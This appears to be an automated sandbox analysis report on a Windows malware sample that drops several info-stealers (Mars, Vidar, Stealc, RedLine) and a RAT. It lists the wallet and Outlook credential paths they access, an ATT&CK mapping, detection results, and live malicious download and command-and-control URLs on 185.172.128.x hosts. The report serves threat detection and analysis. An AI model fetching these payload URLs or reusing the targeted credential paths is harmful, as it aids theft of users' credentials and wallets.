Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 4.2.cmd.exe.62500c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.51400c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.51400c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.62500c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5ek.0.exe PID: 3484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 3488, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\xtfky, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jwjqeqx, type: DROPPED

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 1.3.u5ek.0.exe.5b60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5ek.0.exe.5b60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.40a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cc40000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101749f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101eeb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cc40000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2111483520.0000027276AEB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 21.2.cmd.exe.51400c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.62500c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.51400c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.62500c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 3488, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\xtfky, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jwjqeqx, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5ek.0.exe PID: 3484, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.3.u5ek.0.exe.5b60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5ek.0.exe.5b60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.40a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5ek.0.exe PID: 3484, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C940C40 sqlite3_bind_zeroblob,	1_2_6C940C40
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C940D60 sqlite3_bind_parameter_name,	1_2_6C940D60
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C868EA0 sqlite3_clear_bindings,	1_2_6C868EA0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	341 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Windows Service	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	22 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	3 Obfuscated Files or Information	NTDS	289 System Information Discovery	Distributed Component Object Model	1 Email Collection	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Software Packing	LSA Secrets	551 Security Software Discovery	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	351 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
wxfSIz4PAi.exe	45%	ReversingLabs	Win32.Trojan.Generic
wxfSIz4PAi.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\jwjqeqx	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\u5ek.0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\jwjqeqx	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Temp\jwjqeqx	65%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\u5ek.2\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\u5ek.2\relay.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u5ek.3.exe	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\xtfky	65%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\SecureClient\relay.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.indyproject.org/	0%	URL Reputation	safe
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	0%	URL Reputation	safe
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://185.172.128.228/BroomSetup.exe	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/freebl3.dllA	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe6=	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/mozglue.dllo	0%	Avira URL Cloud	safe
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/freebl3.dllE	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/softokn3.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/sqlite3.dll	0%	Avira URL Cloud	safe
http://185.172.128.59/syncUpd.exe	100%	Avira URL Cloud	malware
http://185.172.128.76/3cd2b41cbde8fc9c.php(;T	0%	Avira URL Cloud	safe
http://185.172.128.76	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.phpad32c124f7c2674f26e5e63942ecbrelease05bfdde8fa3fa3eef0df8c	0%	Avira URL Cloud	safe
http://185.172.128.228/ping.php?substr=two	100%	Avira URL Cloud	malware
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/nss3.dll	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe	100%	Avira URL Cloud	malware
http://185.172.128.76/15f649199f40275b/mozglue.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/softokn3.dllY	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/msvcp140.dll	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe00	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.phpO	0%	Avira URL Cloud	safe
http://note.padd.cn.com/1/Package.zip	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
iolo0.b-cdn.net	195.181.163.193	true	false	high
note.padd.cn.com	176.97.76.106	true	false	unknown
svc.iolo.com	20.157.87.45	true	false	high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	unknown
download.iolo.net	unknown	unknown	true	unknown
westus2-2.in.applicationinsights.azure.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.172.128.228/BroomSetup.exe	false	Avira URL Cloud: safe	unknown
http://185.172.128.76/3cd2b41cbde8fc9c.php	true	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/sqlite3.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/softokn3.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.59/syncUpd.exe	false	Avira URL Cloud: malware	unknown
http://185.172.128.228/ping.php?substr=two	false	Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/nss3.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/mozglue.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.203/tiktok.exe	false	Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/msvcp140.dll	true	Avira URL Cloud: safe	unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx	false		high
http://note.padd.cn.com/1/Package.zip	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.azure.com//.default	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.vmware.com/0	run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://snapshot.monitor.azure.com/&	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.	u5ek.3.exe, 00000006.00000003.2249141509.0000000002606000.00000004.00001000.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000003.2249141509.0000000002669000.00000004.00001000.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000003.2249141509.00000000026A4000.00000004.00001000.00020000.00000000.sdmp	false		high
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.indyproject.org/	wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000003.2249141509.0000000002662000.00000004.00001000.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	false	URL Reputation: safe	unknown
https://support.iolo.com/support/solutions/articles/44001781185?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/privacy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.codeplex.com/CompositeWPF	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.iolo.com/support/solutions/articles/44001781185	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://scripts.sil.org/OFL	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/15f649199f40275b/freebl3.dllA	u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://taskscheduler.codeplex.com/H	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	false		high
https://scripts.sil.org/OFLX8	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	false		high
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 0000000D.00000002.2875147556.0000000003201000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	false		high
https://indiantypefoundry.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmp	false		high
https://download.avira.com/download/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp	false		high
http://dejavu.sourceforge.net	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	u5ek.0.exe, u5ek.0.exe, 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmp	false		high
https://www.iolo.com/company/legal/privacy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	false		high
